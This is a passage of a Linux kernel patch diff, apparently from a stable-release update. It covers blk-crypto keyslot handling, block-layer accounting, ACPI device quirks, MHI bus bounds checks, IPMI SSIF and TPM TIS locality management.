+@@ -13,6 +13,7 @@
+ #include <linux/blkdev.h>
+ #include <linux/blk-crypto-profile.h>
+ #include <linux/module.h>
++#include <linux/ratelimit.h>
+ #include <linux/slab.h>
+ 
+ #include "blk-crypto-internal.h"
+@@ -218,27 +219,27 @@ static bool bio_crypt_check_alignment(struct bio *bio)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	return blk_crypto_get_keyslot(rq->q->crypto_profile,
+ 				      rq->crypt_ctx->bc_key,
+ 				      &rq->crypt_keyslot);
+ }
+ 
+-/**
+- * __blk_crypto_free_request - Uninitialize the crypto fields of a request.
+- *
+- * @rq: The request whose crypto fields to uninitialize.
+- *
+- * Completely uninitializes the crypto fields of a request. If a keyslot has
+- * been programmed into some inline encryption hardware, that keyslot is
+- * released. The rq->crypt_ctx is also freed.
+- */
+-void __blk_crypto_free_request(struct request *rq)
++void __blk_crypto_rq_put_keyslot(struct request *rq)
+ {
+ 	blk_crypto_put_keyslot(rq->crypt_keyslot);
++	rq->crypt_keyslot = NULL;
++}
++
++void __blk_crypto_free_request(struct request *rq)
++{
++	/* The keyslot, if one was needed, should have been released earlier. */
++	if (WARN_ON_ONCE(rq->crypt_keyslot))
++		__blk_crypto_rq_put_keyslot(rq);
++
+ 	mempool_free(rq->crypt_ctx, bio_crypt_ctx_pool);
+-	blk_crypto_rq_set_defaults(rq);
++	rq->crypt_ctx = NULL;
+ }
+ 
+ /**
+@@ -267,7 +268,6 @@ bool __blk_crypto_bio_prep(struct bio **bio_ptr)
+ {
+ 	struct bio *bio = *bio_ptr;
+ 	const struct blk_crypto_key *bc_key = bio->bi_crypt_context->bc_key;
+-	struct blk_crypto_profile *profile;
+ 
+ 	/* Error if bio has no data. */
+ 	if (WARN_ON_ONCE(!bio_has_data(bio))) {
+@@ -284,10 +284,9 @@ bool __blk_crypto_bio_prep(struct bio **bio_ptr)
+ 	 * Success if device supports the encryption context, or if we succeeded
+ 	 * in falling back to the crypto API.
+ 	 */
+-	profile = bdev_get_queue(bio->bi_bdev)->crypto_profile;
+-	if (__blk_crypto_cfg_supported(profile, &bc_key->crypto_cfg))
++	if (blk_crypto_config_supported_natively(bio->bi_bdev,
++						 &bc_key->crypto_cfg))
+ 		return true;
+-
+ 	if (blk_crypto_fallback_bio_prep(bio_ptr))
+ 		return true;
+ fail:
+@@ -352,22 +351,29 @@ int blk_crypto_init_key(struct blk_crypto_key *blk_key, const u8 *raw_key,
+ 	return 0;
+ }
+ 
++bool blk_crypto_config_supported_natively(struct block_device *bdev,
++					  const struct blk_crypto_config *cfg)
++{
++	return __blk_crypto_cfg_supported(bdev_get_queue(bdev)->crypto_profile,
++					  cfg);
++}
++
+ /*
+  * Check if bios with @cfg can be en/decrypted by blk-crypto (i.e. either the
+- * request queue it's submitted to supports inline crypto, or the
++ * block_device it's submitted to supports inline crypto, or the
+  * blk-crypto-fallback is enabled and supports the cfg).
+  */
+-bool blk_crypto_config_supported(struct request_queue *q,
++bool blk_crypto_config_supported(struct block_device *bdev,
+ 				 const struct blk_crypto_config *cfg)
+ {
+ 	return IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK) ||
+-	       __blk_crypto_cfg_supported(q->crypto_profile, cfg);
++	       blk_crypto_config_supported_natively(bdev, cfg);
+ }
+ 
+ /**
+  * blk_crypto_start_using_key() - Start using a blk_crypto_key on a device
++ * @bdev: block device to operate on
+  * @key: A key to use on the device
+- * @q: the request queue for the device
+  *
+  * Upper layers must call this function to ensure that either the hardware
+  * supports the key's crypto settings, or the crypto API fallback has transforms
+@@ -379,37 +385,48 @@ bool blk_crypto_config_supported(struct request_queue *q,
+  *	   blk-crypto-fallback is either disabled or the needed algorithm
+  *	   is disabled in the crypto API; or another -errno code.
+  */
+-int blk_crypto_start_using_key(const struct blk_crypto_key *key,
+-			       struct request_queue *q)
++int blk_crypto_start_using_key(struct block_device *bdev,
++			       const struct blk_crypto_key *key)
+ {
+-	if (__blk_crypto_cfg_supported(q->crypto_profile, &key->crypto_cfg))
++	if (blk_crypto_config_supported_natively(bdev, &key->crypto_cfg))
+ 		return 0;
+ 	return blk_crypto_fallback_start_using_mode(key->crypto_cfg.crypto_mode);
+ }
+ 
+ /**
+- * blk_crypto_evict_key() - Evict a key from any inline encryption hardware
+- *			    it may have been programmed into
+- * @q: The request queue who's associated inline encryption hardware this key
+- *     might have been programmed into
+- * @key: The key to evict
++ * blk_crypto_evict_key() - Evict a blk_crypto_key from a block_device
++ * @bdev: a block_device on which I/O using the key may have been done
++ * @key: the key to evict
++ *
++ * For a given block_device, this function removes the given blk_crypto_key from
++ * the keyslot management structures and evicts it from any underlying hardware
++ * keyslot(s) or blk-crypto-fallback keyslot it may have been programmed into.
+  *
+- * Upper layers (filesystems) must call this function to ensure that a key is
+- * evicted from any hardware that it might have been programmed into.  The key
+- * must not be in use by any in-flight IO when this function is called.
++ * Upper layers must call this before freeing the blk_crypto_key.  It must be
++ * called for every block_device the key may have been used on.  The key must no
++ * longer be in use by any I/O when this function is called.
+  *
+- * Return: 0 on success or if the key wasn't in any keyslot; -errno on error.
++ * Context: May sleep.
+  */
+-int blk_crypto_evict_key(struct request_queue *q,
+-			 const struct blk_crypto_key *key)
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key)
+ {
+-	if (__blk_crypto_cfg_supported(q->crypto_profile, &key->crypto_cfg))
+-		return __blk_crypto_evict_key(q->crypto_profile, key);
++	struct request_queue *q = bdev_get_queue(bdev);
++	int err;
+ 
++	if (blk_crypto_config_supported_natively(bdev, &key->crypto_cfg))
++		err = __blk_crypto_evict_key(q->crypto_profile, key);
++	else
++		err = blk_crypto_fallback_evict_key(key);
+ 	/*
+-	 * If the request_queue didn't support the key, then blk-crypto-fallback
+-	 * may have been used, so try to evict the key from blk-crypto-fallback.
++	 * An error can only occur here if the key failed to be evicted from a
++	 * keyslot (due to a hardware or driver issue) or is allegedly still in
++	 * use by I/O (due to a kernel bug).  Even in these cases, the key is
++	 * still unlinked from the keyslot management structures, and the caller
++	 * is allowed and expected to free it right away.  There's nothing
++	 * callers can do to handle errors, so just log them and return void.
+ 	 */
+-	return blk_crypto_fallback_evict_key(key);
++	if (err)
++		pr_warn_ratelimited("%pg: error %d evicting key\n", bdev, err);
+ }
+ EXPORT_SYMBOL_GPL(blk_crypto_evict_key);
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index bfc33fa9a063c..00d59d2288f00 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -232,7 +232,9 @@ enum {
+ 
+ 	/* 1/64k is granular enough and can easily be handled w/ u32 */
+ 	WEIGHT_ONE		= 1 << 16,
++};
+ 
++enum {
+ 	/*
+ 	 * As vtime is used to calculate the cost of each IO, it needs to
+ 	 * be fairly high precision.  For example, it should be able to
+@@ -256,6 +258,11 @@ enum {
+ 	VRATE_MIN		= VTIME_PER_USEC * VRATE_MIN_PPM / MILLION,
+ 	VRATE_CLAMP_ADJ_PCT	= 4,
+ 
++	/* switch iff the conditions are met for longer than this */
++	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
++};
++
++enum {
+ 	/* if IOs end up waiting for requests, issue less */
+ 	RQ_WAIT_BUSY_PCT	= 5,
+ 
+@@ -294,9 +301,6 @@ enum {
+ 	/* don't let cmds which take a very long time pin lagging for too long */
+ 	MAX_LAGGING_PERIODS	= 10,
+ 
+-	/* switch iff the conditions are met for longer than this */
+-	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
+-
+ 	/*
+ 	 * Count IO size in 4k pages.  The 12bit shift helps keeping
+ 	 * size-proportional components of cost calculation in closer
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index 17ac532105a97..cc7f6a4a255c9 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -863,6 +863,8 @@ static struct request *attempt_merge(struct request_queue *q,
+ 	if (!blk_discard_mergable(req))
+ 		elv_merge_requests(q, req, next);
+ 
++	blk_crypto_rq_put_keyslot(next);
++
+ 	/*
+ 	 * 'next' is going away, so update stats accordingly
+ 	 */
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 1b04a1c48ee50..1ab41fbca0946 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -808,6 +808,12 @@ static void blk_complete_request(struct request *req)
+ 		req->q->integrity.profile->complete_fn(req, total_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	blk_crypto_rq_put_keyslot(req);
++
+ 	blk_account_io_completion(req, total_bytes);
+ 
+ 	do {
+@@ -873,6 +879,13 @@ bool blk_update_request(struct request *req, blk_status_t error,
+ 		req->q->integrity.profile->complete_fn(req, nr_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	if (blk_crypto_rq_has_keyslot(req) && nr_bytes >= blk_rq_bytes(req))
++		__blk_crypto_rq_put_keyslot(req);
++
+ 	if (unlikely(error && !blk_rq_is_passthrough(req) &&
+ 		     !(req->rq_flags & RQF_QUIET)) &&
+ 		     !test_bit(GD_DEAD, &req->q->disk->state)) {
+@@ -1300,7 +1313,7 @@ void blk_execute_rq_nowait(struct request *rq, bool at_head)
+ 	 * device, directly accessing the plug instead of using blk_mq_plug()
+ 	 * should not have any consequences.
+ 	 */
+-	if (current->plug)
++	if (current->plug && !at_head)
+ 		blk_add_rq_to_plug(current->plug, rq);
+ 	else
+ 		blk_mq_sched_insert_request(rq, at_head, true, false);
+@@ -2955,7 +2968,7 @@ void blk_mq_submit_bio(struct bio *bio)
+ 
+ 	blk_mq_bio_to_request(rq, bio, nr_segs);
+ 
+-	ret = blk_crypto_init_request(rq);
++	ret = blk_crypto_rq_get_keyslot(rq);
+ 	if (ret != BLK_STS_OK) {
+ 		bio->bi_status = ret;
+ 		bio_endio(bio);
+diff --git a/block/blk-stat.c b/block/blk-stat.c
+index 2ea01b5c1aca0..da9407b7d4abf 100644
+--- a/block/blk-stat.c
++++ b/block/blk-stat.c
+@@ -189,7 +189,7 @@ void blk_stat_disable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!--q->stats->accounting)
++	if (!--q->stats->accounting && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_clear(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+@@ -200,7 +200,7 @@ void blk_stat_enable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!q->stats->accounting++)
++	if (!q->stats->accounting++ && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_set(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 5c69ff8e8fa5c..c72622f20f52b 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -472,7 +472,9 @@ void crypto_unregister_alg(struct crypto_alg *alg)
+ 	if (WARN(ret, "Algorithm %s is not registered", alg->cra_driver_name))
+ 		return;
+ 
+-	BUG_ON(refcount_read(&alg->cra_refcnt) != 1);
++	if (WARN_ON(refcount_read(&alg->cra_refcnt) != 1))
++		return;
++
+ 	if (alg->cra_destroy)
+ 		alg->cra_destroy(alg);
+ 
+diff --git a/crypto/drbg.c b/crypto/drbg.c
+index 982d4ca4526d8..ff4ebbc68efab 100644
+--- a/crypto/drbg.c
++++ b/crypto/drbg.c
+@@ -1546,7 +1546,7 @@ static int drbg_prepare_hrng(struct drbg_state *drbg)
+ 		const int err = PTR_ERR(drbg->jent);
+ 
+ 		drbg->jent = NULL;
+-		if (fips_enabled || err != -ENOENT)
++		if (fips_enabled)
+ 			return err;
+ 		pr_info("DRBG: Continuing without Jitter RNG\n");
+ 	}
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index 3b6146b1e25cc..a16b7de73d164 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -586,6 +586,7 @@ static void acpi_device_remove_notify_handler(struct acpi_device *device,
+ 		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
+ 	}
++	acpi_os_wait_events_complete();
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+diff --git a/drivers/acpi/power.c b/drivers/acpi/power.c
+index f2588aba8421e..aea8c994caeac 100644
+--- a/drivers/acpi/power.c
++++ b/drivers/acpi/power.c
+@@ -23,6 +23,7 @@
+ 
+ #define pr_fmt(fmt) "ACPI: PM: " fmt
+ 
++#include <linux/dmi.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/init.h>
+@@ -1022,6 +1023,21 @@ void acpi_resume_power_resources(void)
+ }
+ #endif
+ 
++static const struct dmi_system_id dmi_leave_unused_power_resources_on[] = {
++	{
++		/*
++		 * The Toshiba Click Mini has a CPR3 power-resource which must
++		 * be on for the touchscreen to work, but which is not in any
++		 * _PR? lists. The other 2 affected power-resources are no-ops.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "SATELLITE Click Mini L9W-B"),
++		},
++	},
++	{}
++};
++
+ /**
+  * acpi_turn_off_unused_power_resources - Turn off power resources not in use.
+  */
+@@ -1029,6 +1045,9 @@ void acpi_turn_off_unused_power_resources(void)
+ {
+ 	struct acpi_power_resource *resource;
+ 
++	if (dmi_check_system(dmi_leave_unused_power_resources_on))
++		return;
++
+ 	mutex_lock(&power_resource_list_lock);
+ 
+ 	list_for_each_entry_reverse(resource, &acpi_power_resource_list, list_node) {
+diff --git a/drivers/acpi/processor_pdc.c b/drivers/acpi/processor_pdc.c
+index 8c3f82c9fff35..18fb04523f93b 100644
+--- a/drivers/acpi/processor_pdc.c
++++ b/drivers/acpi/processor_pdc.c
+@@ -14,6 +14,8 @@
+ #include <linux/acpi.h>
+ #include <acpi/processor.h>
+ 
++#include <xen/xen.h>
++
+ #include "internal.h"
+ 
+ static bool __init processor_physically_present(acpi_handle handle)
+@@ -47,6 +49,15 @@ static bool __init processor_physically_present(acpi_handle handle)
+ 		return false;
+ 	}
+ 
++	if (xen_initial_domain())
++		/*
++		 * When running as a Xen dom0 the number of processors Linux
++		 * sees can be different from the real number of processors on
++		 * the system, and we still need to execute _PDC for all of
++		 * them.
++		 */
++		return xen_processor_present(acpi_id);
++
+ 	type = (acpi_type == ACPI_TYPE_DEVICE) ? 1 : 0;
+ 	cpuid = acpi_get_cpuid(handle, type, acpi_id);
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index f0f41959faea6..0556c4720d3fa 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -297,20 +297,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
+-	/*
+-	 * Older models with nvidia GPU which need acpi_video backlight
+-	 * control and where the old nvidia binary driver series does not
+-	 * call acpi_video_register_backlight().
+-	 */
+-	{
+-	 .callback = video_detect_force_video,
+-	 /* ThinkPad W530 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
+-		},
+-	},
+-
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+diff --git a/drivers/acpi/viot.c b/drivers/acpi/viot.c
+index ed752cbbe6362..c8025921c129b 100644
+--- a/drivers/acpi/viot.c
++++ b/drivers/acpi/viot.c
+@@ -328,6 +328,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ {
+ 	u32 epid;
+ 	struct viot_endpoint *ep;
++	struct device *aliased_dev = data;
+ 	u32 domain_nr = pci_domain_nr(pdev->bus);
+ 
+ 	list_for_each_entry(ep, &viot_pci_ranges, list) {
+@@ -338,7 +339,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ 			epid = ((domain_nr - ep->segment_start) << 16) +
+ 				dev_id - ep->bdf_start + ep->endpoint_id;
+ 
+-			return viot_dev_iommu_init(&pdev->dev, ep->viommu,
++			return viot_dev_iommu_init(aliased_dev, ep->viommu,
+ 						   epid);
+ 		}
+ 	}
+@@ -372,7 +373,7 @@ int viot_iommu_configure(struct device *dev)
+ {
+ 	if (dev_is_pci(dev))
+ 		return pci_for_each_dma_alias(to_pci_dev(dev),
+-					      viot_pci_dev_iommu_init, NULL);
++					      viot_pci_dev_iommu_init, dev);
+ 	else if (dev_is_platform(dev))
+ 		return viot_mmio_dev_iommu_init(to_platform_device(dev));
+ 	return -ENODEV;
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index f30256a524be6..c440d1af197a4 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -38,11 +38,10 @@ static inline bool cache_leaves_are_shared(struct cacheinfo *this_leaf,
+ {
+ 	/*
+ 	 * For non DT/ACPI systems, assume unique level 1 caches,
+-	 * system-wide shared caches for all other levels. This will be used
+-	 * only if arch specific code has not populated shared_cpu_map
++	 * system-wide shared caches for all other levels.
+ 	 */
+ 	if (!(IS_ENABLED(CONFIG_OF) || IS_ENABLED(CONFIG_ACPI)))
+-		return !(this_leaf->level == 1);
++		return (this_leaf->level != 1) && (sib_leaf->level != 1);
+ 
+ 	if ((sib_leaf->attributes & CACHE_ID) &&
+ 	    (this_leaf->attributes & CACHE_ID))
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index 4c98849577d4e..7af8e33735a36 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -487,7 +487,8 @@ static const struct attribute_group *cpu_root_attr_groups[] = {
+ bool cpu_is_hotpluggable(unsigned int cpu)
+ {
+ 	struct device *dev = get_cpu_device(cpu);
+-	return dev && container_of(dev, struct cpu, dev)->hotpluggable;
++	return dev && container_of(dev, struct cpu, dev)->hotpluggable
++		&& tick_nohz_cpu_hotpluggable(cpu);
+ }
+ EXPORT_SYMBOL_GPL(cpu_is_hotpluggable);
+ 
+diff --git a/drivers/block/drbd/drbd_receiver.c b/drivers/block/drbd/drbd_receiver.c
+index 54010eac6ca91..4ba09abbcaf6f 100644
+--- a/drivers/block/drbd/drbd_receiver.c
++++ b/drivers/block/drbd/drbd_receiver.c
+@@ -1280,7 +1280,7 @@ static void one_flush_endio(struct bio *bio)
+ static void submit_one_flush(struct drbd_device *device, struct issue_flush_context *ctx)
+ {
+ 	struct bio *bio = bio_alloc(device->ldev->backing_bdev, 0,
+-				    REQ_OP_FLUSH | REQ_PREFLUSH, GFP_NOIO);
++				    REQ_OP_WRITE | REQ_PREFLUSH, GFP_NOIO);
+ 	struct one_flush_context *octx = kmalloc(sizeof(*octx), GFP_NOIO);
+ 
+ 	if (!octx) {
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 02893600db390..795be33f2892d 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,7 +354,6 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
+-	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bus/mhi/host/boot.c b/drivers/bus/mhi/host/boot.c
+index 26d0eddb14771..55e909f8cb253 100644
+--- a/drivers/bus/mhi/host/boot.c
++++ b/drivers/bus/mhi/host/boot.c
+@@ -393,6 +393,7 @@ void mhi_fw_load_handler(struct mhi_controller *mhi_cntrl)
+ {
+ 	const struct firmware *firmware = NULL;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	const char *fw_name;
+ 	void *buf;
+ 	dma_addr_t dma_addr;
+@@ -510,14 +511,18 @@ error_ready_state:
+ 	}
+ 
+ error_fw_load:
+-	mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-	wake_up_all(&mhi_cntrl->state_event);
++	write_lock_irq(&mhi_cntrl->pm_lock);
++	new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++	write_unlock_irq(&mhi_cntrl->pm_lock);
++	if (new_state == MHI_PM_FW_DL_ERR)
++		wake_up_all(&mhi_cntrl->state_event);
+ }
+ 
+ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ {
+ 	struct image_info *image_info = mhi_cntrl->fbc_image;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	int ret;
+ 
+ 	if (!image_info)
+@@ -528,8 +533,11 @@ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ 			       &image_info->mhi_buf[image_info->entries - 1]);
+ 	if (ret) {
+ 		dev_err(dev, "MHI did not load AMSS, ret:%d\n", ret);
+-		mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-		wake_up_all(&mhi_cntrl->state_event);
++		write_lock_irq(&mhi_cntrl->pm_lock);
++		new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++		write_unlock_irq(&mhi_cntrl->pm_lock);
++		if (new_state == MHI_PM_FW_DL_ERR)
++			wake_up_all(&mhi_cntrl->state_event);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/bus/mhi/host/init.c b/drivers/bus/mhi/host/init.c
+index bf672de351315..04fbccff65ac2 100644
+--- a/drivers/bus/mhi/host/init.c
++++ b/drivers/bus/mhi/host/init.c
+@@ -516,6 +516,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB)) {
++		dev_err(dev, "CHDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB));
++		return -ERANGE;
++	}
++
+ 	/* Setup wake db */
+ 	mhi_cntrl->wake_db = base + val + (8 * MHI_DEV_WAKE_DB);
+ 	mhi_cntrl->wake_set = false;
+@@ -532,6 +538,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings)) {
++		dev_err(dev, "ERDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings));
++		return -ERANGE;
++	}
++
+ 	/* Setup event db address for each ev_ring */
+ 	mhi_event = mhi_cntrl->mhi_event;
+ 	for (i = 0; i < mhi_cntrl->total_ev_rings; i++, val += 8, mhi_event++) {
+diff --git a/drivers/bus/mhi/host/main.c b/drivers/bus/mhi/host/main.c
+index df0fbfee7b78b..0c3a009ed9bb0 100644
+--- a/drivers/bus/mhi/host/main.c
++++ b/drivers/bus/mhi/host/main.c
+@@ -503,7 +503,7 @@ irqreturn_t mhi_intvec_threaded_handler(int irq_number, void *priv)
+ 	}
+ 	write_unlock_irq(&mhi_cntrl->pm_lock);
+ 
+-	if (pm_state != MHI_PM_SYS_ERR_DETECT || ee == mhi_cntrl->ee)
++	if (pm_state != MHI_PM_SYS_ERR_DETECT)
+ 		goto exit_intvec;
+ 
+ 	switch (ee) {
+diff --git a/drivers/char/ipmi/Kconfig b/drivers/char/ipmi/Kconfig
+index 39565cf74b2c9..df45e0af92382 100644
+--- a/drivers/char/ipmi/Kconfig
++++ b/drivers/char/ipmi/Kconfig
+@@ -162,7 +162,8 @@ config IPMI_KCS_BMC_SERIO
+ 
+ config ASPEED_BT_IPMI_BMC
+ 	depends on ARCH_ASPEED || COMPILE_TEST
+-	depends on REGMAP && REGMAP_MMIO && MFD_SYSCON
++	depends on MFD_SYSCON
++	select REGMAP_MMIO
+ 	tristate "BT IPMI bmc driver"
+ 	help
+ 	  Provides a driver for the BT (Block Transfer) IPMI interface
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index a5ddebb1edea4..d48061ec27dd9 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -557,8 +557,10 @@ static void retry_timeout(struct timer_list *t)
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
+-	if (resend)
++	if (resend) {
+ 		start_resend(ssif_info);
++		ssif_inc_stat(ssif_info, send_retries);
++	}
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -784,9 +786,9 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 		} else if (data[0] != (IPMI_NETFN_APP_REQUEST | 1) << 2
+ 			   || data[1] != IPMI_GET_MSG_FLAGS_CMD) {
+ 			/*
+-			 * Don't abort here, maybe it was a queued
+-			 * response to a previous command.
++			 * Recv error response, give up.
+ 			 */
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Invalid response getting flags: %x %x\n",
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 409682d063098..5165f6d3da228 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -678,7 +678,8 @@ EXPORT_SYMBOL_GPL(tpm_chip_register);
+ void tpm_chip_unregister(struct tpm_chip *chip)
+ {
+ 	tpm_del_legacy_sysfs(chip);
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip))
++	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip) &&
++	    !tpm_amd_is_rng_defective(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ 	tpm_bios_log_teardown(chip);
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2 && !tpm_is_firmware_upgrade(chip))
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 3f98e587b3e84..eecfbd7e97867 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -136,16 +136,27 @@ static bool check_locality(struct tpm_chip *chip, int l)
+ 	return false;
+ }
+ 
+-static int release_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_relinquish_locality(struct tpm_tis_data *priv, int l)
++{
++	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++
++	return 0;
++}
++
++static int tpm_tis_relinquish_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++	mutex_lock(&priv->locality_count_mutex);
++	priv->locality_count--;
++	if (priv->locality_count == 0)
++		__tpm_tis_relinquish_locality(priv, l);
++	mutex_unlock(&priv->locality_count_mutex);
+ 
+ 	return 0;
+ }
+ 
+-static int request_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_request_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 	unsigned long stop, timeout;
+@@ -186,6 +197,20 @@ again:
+ 	return -1;
+ }
+ 
++static int tpm_tis_request_locality(struct tpm_chip *chip, int l)
++{
++	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
++	int ret = 0;
++
++	mutex_lock(&priv->locality_count_mutex);
++	if (priv->locality_count == 0)
++		ret = __tpm_tis_request_locality(chip, l);
++	if (!ret)
++		priv->locality_count++;
++	mutex_unlock(&priv->locality_count_mutex);
++	return ret;
++}
++
+ static u8 tpm_tis_status(struct tpm_chip *chip)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+@@ -652,7 +677,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 	if (vendor != TPM_VID_INTEL)
+ 		return 0;
+ 
+-	if (request_locality(chip, 0) != 0)
++	if (tpm_tis_request_locality(chip, 0) != 0)
+ 		return -EBUSY;
+ 
+ 	rc = tpm_tis_send_data(chip, cmd_getticks, len);
+@@ -673,7 +698,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 
+ out:
+ 	tpm_tis_ready(chip);
+-	release_locality(chip, priv->locality);
++	tpm_tis_relinquish_locality(chip, priv->locality);
+ 
+ 	return rc;
+ }
+@@ -732,25 +757,17 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int tpm_tis_gen_interrupt(struct tpm_chip *chip)
++static void tpm_tis_gen_interrupt(struct tpm_chip *chip)
+ {
+ 	const char *desc = "attempting to generate an interrupt";
+ 	u32 cap2;
+ 	cap_t cap;
+ 	int ret;
+ 
+-	ret = request_locality(chip, 0);
+-	if (ret < 0)
+-		return ret;
+-
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2)
+ 		ret = tpm2_get_tpm_pt(chip, 0x100, &cap2, desc);
+ 	else
